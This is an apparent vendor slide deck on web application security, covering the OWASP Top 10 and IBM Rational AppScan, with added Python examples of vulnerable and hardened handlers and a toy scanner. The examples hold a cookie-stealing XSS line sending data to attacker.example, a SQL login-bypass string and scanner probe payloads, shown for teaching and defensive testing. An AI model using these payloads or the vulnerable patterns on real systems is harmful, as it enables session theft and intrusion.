Securing Your Web Application against security vulnerabilities Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group
Agenda
- Security Landscape
- Vulnerability Analysis
- Automated Vulnerability Analysis
- IBM Rational AppScan Overview
The Myth: Our Site Is Safe
- Myth: "We have firewalls and IPS in place." Reality: ports 80 and 443 are open for the right reasons, and the attacks come through them.
- Myth: "We audit it once a quarter with pen testers." Reality: applications are constantly changing.
- Myth: "We use network vulnerability scanners." Reality: they neglect the security of the software running on the network/web server.
- Myth: "We use SSL encryption." Reality: SSL only protects data between the site and the user, not the web application itself.
Reality: Security and Spending Are Unbalanced
- 75% of all attacks on information security are directed at the web application layer
- 2/3 of all web applications are vulnerable
(Source: Gartner)
The Alarming Reality
[Screenshot: "Hacking Stage 6", Wikipedia, Feb 9 2007]
Why Application Security is a High Priority
Web applications are the #1 focus of hackers:
- 75% of attacks are at the application layer (Gartner)
- XSS and SQL Injection are the #1 and #2 reported vulnerabilities (MITRE)
Most sites are vulnerable:
- 90% of sites are vulnerable to application attacks (Watchfire)
- 78% of easily exploitable vulnerabilities affected web applications (Symantec)
- 80% of organizations will experience an application security incident by 2010 (Gartner)
Web applications are high-value targets for hackers: customer data, credit cards, ID theft, fraud, site defacement, etc.
Compliance requirements: Payment Card Industry (PCI) standards, GLBA, HIPAA, FISMA
The Security Landscape of the Past
Traditional infrastructure was easier to protect:
- Concrete entities that were easy to understand
- Attack surface and vectors were very well defined
- Application footprint was very static
- Perimeter defense was king
Changing Security Landscape of Today
Webification has changed everything:
- Infrastructure is more abstract and less defined
- Everything needs a web interface
- Agents and heavy clients are no longer acceptable
- Traditional defenses no longer apply
High-Level Web Application Architecture Review
[Diagram, left to right: Client Tier (Browser) -> Internet -> Firewall -> Middle Tier: App Server (Presentation, Business Logic) -> Data Tier: Database]
- SSL protects the transport; the firewall protects the network
- The customer application is deployed in the middle tier
- Sensitive data is stored in the data tier
Network Security Defenses for Web Applications
[Diagram: perimeter defenses placed in front of the web application]
- Firewall
- IDS: Intrusion Detection System
- IPS: Intrusion Prevention System
- App Firewall: Application Firewall
- SIEM: Security Information and Event Management
What Can Happen?
Why Do Hackers Today Target Applications?
- Because they know you have firewalls: it is no longer convenient to attack the network, but they still want to steal data.
- Because firewalls do not protect against application attacks, so the hackers are having a field day; very few people are actively aware of application security issues.
- Because web sites have a large footprint: no need to worry about cumbersome IP addresses any more.
- Because they can:
  - It is difficult or impossible to write a comprehensively robust application.
  - Developers do not yet have secure coding as second nature.
  - Developers think differently from hackers.
  - Cheap, fast, good: choose two, you can't have it all.
  - It is also a nightmare to manually QA the application.
  - White-box static code analyzers don't test for inter-application relationships.
  - Many companies today still do not have a software security QA policy or resource.
Vulnerability Analysis
The OWASP Top 10 list (Application Threat / Negative Impact / Example Impact)
1. Cross-Site Scripting
   Negative impact: identity theft, sensitive information leakage
   Example impact: hackers can impersonate legitimate users and control their accounts
2. Injection Flaws
   Negative impact: attacker can manipulate queries to the DB / LDAP / other system
   Example impact: hackers can access backend database information, alter it or steal it
3. Malicious File Execution
   Negative impact: execute shell commands on the server, up to full control
   Example impact: site modified to transfer all interactions to the hacker
4. Insecure Direct Object Reference
   Negative impact: attacker can access sensitive files and resources
   Example impact: web application returns the contents of a sensitive file (instead of a harmless one)
5. Cross-Site Request Forgery
   Negative impact: attacker can invoke blind actions on web applications, impersonating a trusted user
   Example impact: blind requests to a bank account transfer money to the hacker
6. Information Leakage and Improper Error Handling
   Negative impact: attackers can gain detailed system information
   Example impact: malicious system reconnaissance may assist in developing further attacks
7. Broken Authentication & Session Management
   Negative impact: session tokens not guarded or invalidated properly
   Example impact: hacker can force a session token on a victim; session tokens can be stolen after logout
8. Insecure Cryptographic Storage
   Negative impact: weak encryption techniques may lead to broken encryption
   Example impact: confidential information (SSN, credit cards) can be decrypted by malicious users
9. Insecure Communications
   Negative impact: sensitive info sent unencrypted over an insecure channel
   Example impact: unencrypted credentials sniffed and used by a hacker to impersonate the user
10. Failure to Restrict URL Access
   Negative impact: hacker can access unauthorized resources
   Example impact: hacker can forcefully browse to and access a page past the login page
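Three of the entries above (Injection Flaws, Cross-Site Scripting, Insecure Direct Object Reference) shown as a vulnerable handler beside its hardened form. This is an added example written for this page, not code from the original slides or from IBM; the in-memory SQLite table, the document store and all user names are constructed sample data.

```python
import html
import sqlite3

# Constructed in-memory users table (sample data, not from the original slides).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn

# --- Injection Flaws: vulnerable login builds SQL by string concatenation ---
def login_vulnerable(conn, name, password):
    sql = "SELECT id FROM users WHERE name = '%s' AND password = '%s'" % (name, password)
    # A password of  ' OR '1'='1  turns the WHERE clause into a tautology.
    return conn.execute(sql).fetchone() is not None

# --- Hardened: parameterized query; user input is bound as data, never parsed as SQL ---
def login_hardened(conn, name, password):
    row = conn.execute("SELECT id FROM users WHERE name = ? AND password = ?",
                       (name, password)).fetchone()
    return row is not None

# --- Cross-Site Scripting: vulnerable greeting echoes untrusted input into HTML ---
def greet_vulnerable(name):
    return "<p>Hello, %s</p>" % name

# --- Hardened: escape for the HTML body context at the point of output ---
def greet_hardened(name):
    return "<p>Hello, %s</p>" % html.escape(name, quote=True)

# --- Insecure Direct Object Reference: constructed document store, id -> (owner, content) ---
DOCS = {101: ("alice", "alice's invoice"), 102: ("bob", "bob's invoice")}

def get_doc_vulnerable(user, doc_id):
    # Any authenticated user can fetch any document by guessing its id.
    return DOCS[doc_id][1]

def get_doc_hardened(user, doc_id):
    # Authorization check against the requesting user, not just authentication.
    owner, content = DOCS.get(doc_id, (None, None))
    if owner is None or owner != user:
        raise PermissionError("user %r may not read document %r" % (user, doc_id))
    return content

if __name__ == "__main__":
    conn = make_db()
    bypass = "' OR '1'='1"
    print("vulnerable login with tautology:", login_vulnerable(conn, "alice", bypass))
    print("hardened login with tautology:  ", login_hardened(conn, "alice", bypass))
    xss = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
    print(greet_vulnerable(xss))
    print(greet_hardened(xss))
    print("bob reads alice's doc (vulnerable):", get_doc_vulnerable("bob", 101))
    try:
        get_doc_hardened("bob", 101)
    except PermissionError as exc:
        print("hardened:", exc)
```

The fixes are the same shape in every case: keep untrusted input out of the interpreter's syntax (bind parameters, encode for the output context) and check authorization on every object access rather than trusting that the user will only request ids they were shown.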
Automated Vulnerability Analysis IBM Rational AppScan
SECURITY TESTING IS PART OF SDLC QUALITY TESTING
[Diagram: Collaborative Application Lifecycle Management. SDLC quality assurance built on a quality dashboard, requirements management, test management and execution (create plan, build tests, manage test lab, report results) and defect management, over an open platform with best-practice processes and open lifecycle service integrations (Team Server). Test types covered: functional testing (SAP, Java, .NET, System z, System i, homegrown), performance testing, web service quality, code quality, security and compliance.]
AppScan in the Rational Portfolio
[Diagram: Business Software Quality Solutions spanning development and operations]
- Test and change management: Rational RequisitePro (requirements), Rational ClearQuest (test, change, defects)
- Test automation: developer test (Rational PurifyPlus, Rational Test RealTime); functional test, automated and manual (Rational Functional Tester, Rational Functional Tester Plus, Rational Manual Tester, Rational Robot); security and compliance test (AppScan, PolicyTester); performance test (Rational Performance Tester)
- Quality metrics: project dashboards, detailed test results, quality reports
Rational AppScan
What is it? AppScan is an automated tool used to perform vulnerability assessments on web applications.
Why do I need it? To simplify finding and fixing web application security problems.
What does it do? Scans web applications, finds security issues and reports on them in an actionable fashion.
Who uses it?
- Security auditors: the main users today
- QA engineers: when the auditors become the bottleneck
- Developers: to find issues as early as possible (the most efficient point)
How does AppScan work?
- Approaches the application as a black box
- Traverses the web application and builds the site model
- Determines the attack vectors based on the selected test policy
- Tests by sending modified HTTP requests to the application and examining each HTTP response according to validation rules
[Diagram: AppScan sends HTTP requests to the web application (web servers, databases) and examines the HTTP responses]
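The four steps above, crawl, build a site model, pick attack vectors from a test policy, send modified requests and validate the responses, in a minimal black-box scanner. This is an added illustration written for this page; it is not AppScan code and does not describe AppScan's internals. The target is a constructed in-process toy application (the TOY_APP handlers and the send() round trip are stand-ins for a real HTTP server), with one parameter that reflects input unencoded and one that leaks a database error.

```python
import re
from urllib.parse import urlparse, parse_qs, urlencode

# --- Constructed toy web application (stands in for the real target; not AppScan code) ---
# Each handler takes the parsed query parameters and returns an HTML body.
def _index(params):
    return ('<html><body><a href="/search?q=shoes">search</a> '
            '<a href="/item?id=1">item</a> <a href="/about">about</a></body></html>')

def _search(params):
    q = params.get("q", [""])[0]
    return "<html><body>Results for: %s</body></html>" % q      # reflects input unescaped (XSS)

def _item(params):
    item_id = params.get("id", ["1"])[0]
    if "'" in item_id:                                          # mimics a leaked DB error (SQLi hint)
        return "<html><body>SQL error: unrecognized token near \"'\"</body></html>"
    if not item_id.isdigit():
        return "<html><body>Invalid item</body></html>"
    return "<html><body>Item %s</body></html>" % item_id

def _about(params):
    return "<html><body>About us</body></html>"

TOY_APP = {"/": _index, "/search": _search, "/item": _item, "/about": _about}

def send(url):
    """Simulated HTTP round trip: url -> response body."""
    parsed = urlparse(url)
    handler = TOY_APP.get(parsed.path)
    if handler is None:
        return "404 Not Found"
    return handler(parse_qs(parsed.query, keep_blank_values=True))

# --- Step 1: explore. Follow links to build the site model: path -> set of parameter names ---
LINK_RE = re.compile(r'href="([^"]+)"')

def build_site_model(start="/"):
    model, queue, seen = {}, [start], set()
    while queue:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        parsed = urlparse(url)
        body = send(url)
        model.setdefault(parsed.path, set()).update(parse_qs(parsed.query).keys())
        queue.extend(LINK_RE.findall(body))
    return model

# --- Step 2: test policy. Each test = (name, payload, validation rule over the response) ---
TEST_POLICY = [
    ("Cross-Site Scripting", "<script>alert(1)</script>",
     lambda payload, body: payload in body),                       # echoed back unencoded
    ("SQL Injection", "1'",
     lambda payload, body: re.search(r"SQL error|syntax error|unrecognized token",
                                     body, re.I) is not None),     # error-based detection
]

# --- Step 3: test. Send one modified request per (parameter, test) and validate the response ---
def scan(model):
    findings = []
    for path, params in sorted(model.items()):
        for param in sorted(params):
            for name, payload, rule in TEST_POLICY:
                url = path + "?" + urlencode({param: payload})
                body = send(url)
                if rule(payload, body):
                    findings.append((name, path, param))
    return findings

if __name__ == "__main__":
    site = build_site_model()
    print("site model:", {p: sorted(v) for p, v in site.items()})
    for issue in scan(site):
        print("%-22s %s [%s]" % issue)
```

Two practical caveats a black-box scanner inherits from this design: it can only test parameters it discovered during the crawl (pages behind logins or JavaScript-generated links need a recorded session or manual exploration), and a validation rule that looks for a reflected payload or an error string reports what the response shows, so a filter that strips the payload or a custom error page hides the flaw without fixing it.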
AppScan Goes Beyond Pointing out Problems
Scanning in Progress
Identify Vulnerabilities
Actionable Fix Recommendations
Reports